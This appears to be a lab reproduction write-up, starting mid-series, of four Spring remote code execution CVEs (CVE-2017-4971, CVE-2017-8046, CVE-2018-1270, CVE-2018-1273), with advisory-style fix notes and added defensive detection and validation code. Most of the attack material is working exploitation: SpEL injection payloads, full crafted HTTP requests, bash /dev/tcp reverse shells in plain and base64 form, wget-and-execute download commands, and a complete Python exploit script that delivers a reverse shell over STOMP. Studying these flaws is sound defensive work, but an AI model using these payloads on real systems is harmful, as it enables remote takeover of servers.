Safety protection

1. Users of version 1.0.x should stop using the Whitelabel view for the authentication and error pages.

2. Users of version 2.0.x should upgrade to version 2.0.10 or later.

Because I am not familiar with Java, I did not analyze the underlying principles

2. Spring Web Flow Framework Remote Code Execution (CVE-2017-4971)

Vulnerability profile

Spring Web Flow is a subproject of Spring that addresses stateful interactions between users and servers across multiple requests, providing abstract capabilities to describe business processes.

Spring WebFlow is a framework for developing process-based applications, such as shopping logic, that separates the definition of a process from the classes and views that implement its behaviour. In the 2.4.x versions, a field name controlled by the user during data binding is evaluated as a SpEL expression, which leads to SpEL expression injection and arbitrary command execution.

Affected versions

Spring WebFlow 2.4.0 - 2.4.4

Trigger conditions

  1. The useSpringBeanBinding property of the MvcViewFactoryCreator object is set to false (the default)

  2. The BinderConfiguration of the flow's view object is empty (no explicit binder is configured for the view)

Vulnerability reproduction

Start the vulnerable environment

Click Login

You can see that there are a lot of default usernames and passwords, so just choose any of them to log in to the system

Then access the hotel with id 1:

http://192.168.173.144:8080/hotels/1

Click the reservation button "Book Hotel", fill in the relevant information and then click "Proceed" (from this step on, WebFlow actually starts).

After entering some arbitrary values, click Proceed and you are taken to the Confirm page (the credit card number must be 16 digits):

Click Confirm and capture the request.

Reverse shell PoC:

Original PoC:

&_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/192.168.173.133/1234 0>&1")).start()=vulhub

URL-encoded:

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.173.133/1234+0>%261")).start()=vulhub

Exploit variations

1. Create a file

&_T(java.lang.Runtime).getRuntime().exec("touch /tmp/zcc")


2. Use wget to download a remote bash script

&_T(java.lang.Runtime).getRuntime().exec("/usr/bin/wget -qO /tmp/shell http://x.x.x.x:xxxx/shell")


3. Execute the script downloaded in the previous step

&_T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/shell")


Safety protection

A fixed version has been released; affected users should upgrade to the latest version to protect against this vulnerability. The vendor also recommends changing the default data binding settings so that submitted form data is restricted to the expected fields, which blocks this kind of malicious input. Reference link:

https://pivotal.io/security/cve-2017-4971

For an analysis of the underlying principle of this vulnerability, see: paper.seebug.org/322/

3. Spring Data REST Remote Command Execution (CVE-2017-8046)

Vulnerability profile

When a Spring Data REST server processes a PATCH request, an attacker can construct a malicious PATCH request and send it to the server; the crafted JSON data then executes arbitrary Java code.

Affected versions

Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0 M4
Spring Data release trains < Kay-RC3

Vulnerability validation

Start the vulnerable environment:

If the return value is in JSON format, this is a RESTful API server.

Access the following URL. If the following information is displayed, the vulnerability exists:

http://192.168.173.144:8080/customers/1

Vulnerability reproduction

Capture the request with Burp Suite and change it to a PATCH request:

Create the PoC for "touch /tmp/zcc" (the command as a comma-separated list of byte values):

>>> ','.join(map(str, map(ord, "touch /tmp/zcc")))
'116,111,117,99,104,32,47,116,109,112,47,122,99,99'

Write this byte list into the PoC and put it in the request body. Note that the JSON-format PoC must be separated from the headers by a blank line, and the Content-Type must be application/json-patch+json.

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 201

[{"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,122,99,99}))/lastname", "value": "vulhub"}]

Written successfully:

Reverse shell PoC; base64-encode the command first:

bash -i >& /dev/tcp/192.168.173.133/1234 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

The same command as a byte list for the PoC:

98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,77,121,52,120,77,122,77,118,77,84,73,122,78,67,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

Write the PoC into the request and the reverse shell connects back successfully.

Safety protection

Upgrade to the following latest versions:

  • Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
  • Spring Boot 2.0.0.M4
  • Spring Data release train Kay-RC3

For an analysis of the underlying principle of this vulnerability, see: blog.spoock.com/2018/05/22/…

4. Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)

Vulnerability profile

Spring Messaging provides messaging support for the Spring Framework. Its upper-layer protocol is STOMP and the lower-layer transport is based on SockJS. The STOMP message broker has a SpEL expression injection vulnerability when processing client messages: it filters messages with a selector, the selector is written as a SpEL expression, and it is evaluated with a StandardEvaluationContext, so a crafted selector results in command execution.

Affected versions

Spring Framework 5.0 - 5.0.5
Spring Framework 4.3 - 4.3.15
Older, unsupported versions are also affected

Vulnerability validation

Start the vulnerable environment

Visit this page:

http://192.168.173.144:8080/gs-guide-websocket

Vulnerability reproduction

Base64-encode the reverse shell command:

bash -i >& /dev/tcp/192.168.173.133/1234 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

Create exp.py, changing the IP address and the command to suit:

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)


def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # SockJS session URL: <endpoint>/<server id>/<session id>
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time() * 1000)

    def run(self):
        # Keep the SockJS receive channel open; the server pushes frames here
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            pass

    def send(self, command, headers, body=''):
        # Build one STOMP frame: COMMAND, header lines, blank line, body, NUL
        data = [command.upper(), '\n']
        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://192.168.173.144:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3My4xMzMvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

The reverse shell connects back successfully.
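For detection on the server side or at a SockJS-aware proxy, the frames exp.py sends can be parsed back out of the xhr_send bodies and the SUBSCRIBE selector header inspected for SpEL constructs that a legitimate header-comparison selector never needs (type references, constructor calls, method invocations, variables). The Python below is an added example written for this page, not code from vulhub or from Spring. The sample traffic is constructed to mirror the script's frame layout, with a harmless placeholder command in place of the reverse shell, and the function names are the example's own.

```python
import json
import re

# SpEL features a STOMP message selector never legitimately needs: type
# references T(...), constructor calls, method invocations and #variables.
# A legitimate selector only compares message headers, e.g. headers['x'] == 'y'.
SPEL_INDICATORS = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+\s*\(|\.\s*\w+\s*\(|#\w+")


def build_sockjs_body(command, headers, body=""):
    """Wrap one STOMP frame the way a SockJS xhr_send request carries it:
    a JSON array holding COMMAND, header lines, a blank line, the body and NUL
    (the same layout exp.py above produces)."""
    head = "\n".join(f"{k}:{v}" for k, v in headers.items())
    return json.dumps([f"{command.upper()}\n{head}\n\n{body}\x00"])


def parse_sockjs_frames(xhr_send_body):
    """Split a SockJS xhr_send body back into STOMP frames as dicts."""
    frames = []
    for raw in json.loads(xhr_send_body):
        head, _, body = raw.rstrip("\x00").partition("\n\n")
        lines = head.split("\n")
        headers = {}
        for line in lines[1:]:
            if not line:
                continue
            key, _, value = line.partition(":")  # header values may contain ':'
            headers.setdefault(key.strip().lower(), value.strip())  # STOMP: first value wins
        frames.append({"command": lines[0].strip().upper(), "headers": headers, "body": body})
    return frames


def audit_sockjs_bodies(bodies):
    """Return one finding per SUBSCRIBE frame whose selector contains a SpEL construct."""
    findings = []
    for xhr_send_body in bodies:
        for frame in parse_sockjs_frames(xhr_send_body):
            if frame["command"] != "SUBSCRIBE":
                continue
            selector = frame["headers"].get("selector", "")
            match = SPEL_INDICATORS.search(selector)
            if match:
                findings.append({
                    "subscription": frame["headers"].get("id"),
                    "destination": frame["headers"].get("destination"),
                    "indicator": match.group(0),
                    "selector": selector,
                })
    return findings


# Constructed sample traffic: a normal session plus one subscription carrying a
# type-reference selector of the kind the CVE-2018-1270 exploit uses. The command
# inside it is a harmless placeholder, not the page's reverse shell.
_MESSAGE = json.dumps({"name": "vulhub"})
SAMPLE_BODIES = [
    build_sockjs_body("connect", {"accept-version": "1.1,1.0", "heart-beat": "10000,10000"}),
    build_sockjs_body("subscribe", {"selector": "headers['region'] == 'eu'",
                                    "id": "sub-0", "destination": "/topic/greetings"}),
    build_sockjs_body("subscribe", {"selector": "T(java.lang.Runtime).getRuntime().exec('id')",
                                    "id": "sub-1", "destination": "/topic/greetings"}),
    build_sockjs_body("send", {"content-length": len(_MESSAGE), "destination": "/app/hello"},
                      _MESSAGE),
]

if __name__ == "__main__":
    for finding in audit_sockjs_bodies(SAMPLE_BODIES):
        print(f"ALERT subscription={finding['subscription']} "
              f"indicator={finding['indicator']!r} selector={finding['selector']!r}")
```

The benign subscription with `headers['region'] == 'eu'` passes, the one with a `T(...)` type reference is reported with the subscription id and destination so it can be correlated with the SockJS session. On the framework side, the fixed releases (4.3.15 and 5.0.5) evaluate the selector with SimpleEvaluationContext, which has no type locator, so such selectors fail there; the parser above is the view you want on traffic reaching unpatched instances.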

Safety protection

1. Upgrade the Spring Framework to a fixed version (5.0.5 or 4.3.15 or later).

2. If you are using Spring Boot, upgrade to a fixed version (2.0.1 or later).

An analysis of the underlying principles can be found at paper.seebug.org/562/

5.Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)

Vulnerability profile

Spring Data is an open source framework for simplifying database access and supporting cloud services. Spring Data Commons is the infrastructure shared by all Spring Data subprojects. Spring Data Commons 2.0.5 and earlier has a SpEL expression injection vulnerability that allows an attacker to inject malicious SpEL expressions and execute arbitrary commands.

Affected versions

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 - 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)

Vulnerability validation

Start the vulnerable environment

Vulnerability reproduction

Access the URL and capture the request with Burp Suite:

http://192.168.173.144:8080/users

The request carrying the PoC is as follows:

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.173.144:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.173.144:8080
Connection: close
Referer: http://192.168.173.144:8080/users
Cookie: JSESSIONID=F773DEBD35D866E11D6753373652513C
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
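The CVE-2017-8046 request earlier on this page (a JSON Patch whose "path" is evaluated as SpEL) and this CVE-2018-1273 request (a form field name evaluated as SpEL) share one root cause: a client-controlled path string reaches an expression evaluator. The Python below is an added example written for this page, not part of the original write-up and not Spring's code. It shows the defensive alternative for both cases: treat a JSON Patch path strictly as an RFC 6901 pointer and a form field name strictly as a dotted/bracketed property path, walk the target structure segment by segment, and reject anything that is not a plain name before it can be evaluated. The two request bodies are taken from this page; the customer document and the benign inputs are constructed, and all function names are the example's own.

```python
import json
import re
from urllib.parse import parse_qsl

# A member name, map key or list index: letters, digits, underscore, hyphen.
# Anything else ('(', '#', quotes, spaces) is not a name, so it is rejected
# instead of ever reaching an expression evaluator.
SEGMENT = re.compile(r"[A-Za-z0-9_-]+")


class UnsafePath(ValueError):
    """Raised when a client-supplied path is not a plain structural path."""


def json_pointer_segments(path):
    """Split an RFC 6901 JSON Pointer ('/a/b/0') into validated segments.
    The empty pointer (whole document) and escaped names (~0, ~1) are
    deliberately outside the allow-list."""
    if not path.startswith("/"):
        raise UnsafePath(f"pointer must start with '/': {path!r}")
    segments = path[1:].split("/")
    for seg in segments:
        if not SEGMENT.fullmatch(seg):
            raise UnsafePath(f"segment is not a plain member name: {seg!r}")
    return segments


def audit_patch_body(patch_body):
    """Return the 'path' values in a JSON Patch body that are not plain pointers."""
    bad = []
    for op in json.loads(patch_body):
        try:
            json_pointer_segments(str(op.get("path", "")))
        except UnsafePath:
            bad.append(op.get("path"))
    return bad


def apply_replace_patch(doc, patch_body):
    """Apply 'replace' ops by walking the document structurally; no evaluation."""
    doc = json.loads(json.dumps(doc))  # work on a copy
    for op in json.loads(patch_body):
        if op.get("op") != "replace":
            raise UnsafePath(f"unsupported op: {op.get('op')!r}")
        segments = json_pointer_segments(str(op.get("path", "")))
        parent = doc
        for seg in segments[:-1]:
            parent = parent[int(seg)] if isinstance(parent, list) else parent[seg]
        key = int(segments[-1]) if isinstance(parent, list) else segments[-1]
        if isinstance(parent, dict) and key not in parent:
            raise KeyError(f"unknown member {key!r}")
        parent[key] = op["value"]
    return doc


# One dotted part of a property path: name, optionally followed by [index] or [key].
PROPERTY_PART = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)((?:\[[A-Za-z0-9_-]+\])*)")


def property_path_segments(field_name):
    """Accept only name, name.nested, name[0] or name[key]; reject everything else,
    such as username[#this.getClass()...] from the request above."""
    segments = []
    for part in field_name.split("."):
        m = PROPERTY_PART.fullmatch(part)
        if not m:
            raise UnsafePath(f"not a property path: {field_name!r}")
        segments.append(m.group(1))
        segments.extend(re.findall(r"\[([A-Za-z0-9_-]+)\]", m.group(2)))
    return segments


def audit_form_body(body):
    """Return the field names in a form-urlencoded body that are not property paths."""
    bad = []
    for name, _ in parse_qsl(body, keep_blank_values=True):
        try:
            property_path_segments(name)
        except UnsafePath:
            bad.append(name)
    return bad


# Constructed sample document and benign inputs.
CUSTOMER = {"firstname": "Mark", "lastname": "Smith", "addresses": [{"city": "Rome"}]}
GOOD_PATCH = '[{"op": "replace", "path": "/lastname", "value": "vulhub"}]'
NESTED_PATCH = '[{"op": "replace", "path": "/addresses/0/city", "value": "Oslo"}]'
GOOD_FORM = "username=alice&address.city=Oslo&roles[0]=user&password=&repeatedPassword="
# The path from the CVE-2017-8046 request on this page: a SpEL expression, not a pointer.
BAD_PATCH = ('[{"op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec('
             'new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,122,99,99}))'
             '/lastname", "value": "vulhub"}]')
# The form body from the CVE-2018-1273 request above.
BAD_FORM = ('username[#this.getClass().forName("java.lang.Runtime").getRuntime()'
            '.exec("touch /tmp/zcc")]=&password=&repeatedPassword=')

if __name__ == "__main__":
    print(apply_replace_patch(CUSTOMER, GOOD_PATCH))
    print("rejected patch paths:", audit_patch_body(BAD_PATCH))
    print("rejected form fields:", audit_form_body(BAD_FORM))
```

The point of `apply_replace_patch` is that a pointer is resolved by indexing dicts and lists, never by evaluating the string, so the expression in the page's PoC is rejected at the first segment check. The same allow-list approach applies to the form field names: `address.city` and `roles[0]` bind, the bracketed expression does not. This is a mitigation in application code for instances that cannot be upgraded immediately; it is not a substitute for the fixed releases listed below.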

Written successfully.

Reverse shell:

Write a shell.sh file and start an HTTP server to serve it.

Download the sh script:

/usr/bin/wget -qO /tmp/shell.sh http://192.168.173.131/shell.sh

Run shell.sh:

/bin/bash /tmp/shell.sh

Successful rebound.

Safety protection

  1. Users of affected versions should apply the following mitigation measures:

  • 2.0.x users should upgrade to 2.0.6

  • 1.13.x users should upgrade to 1.13.11

  • Older versions should be upgraded to a supported branch

Releases that have addressed this issue include:

  • Spring Data REST 2.6.11 (Ingalls SR11)

  • Spring Data REST 3.0.6 (Kay SR6)

  • Spring Boot 1.5.11

  • Spring Boot 2.0.1

  2. Use the authentication and authorization provided by Spring Security to restrict access to the affected endpoints.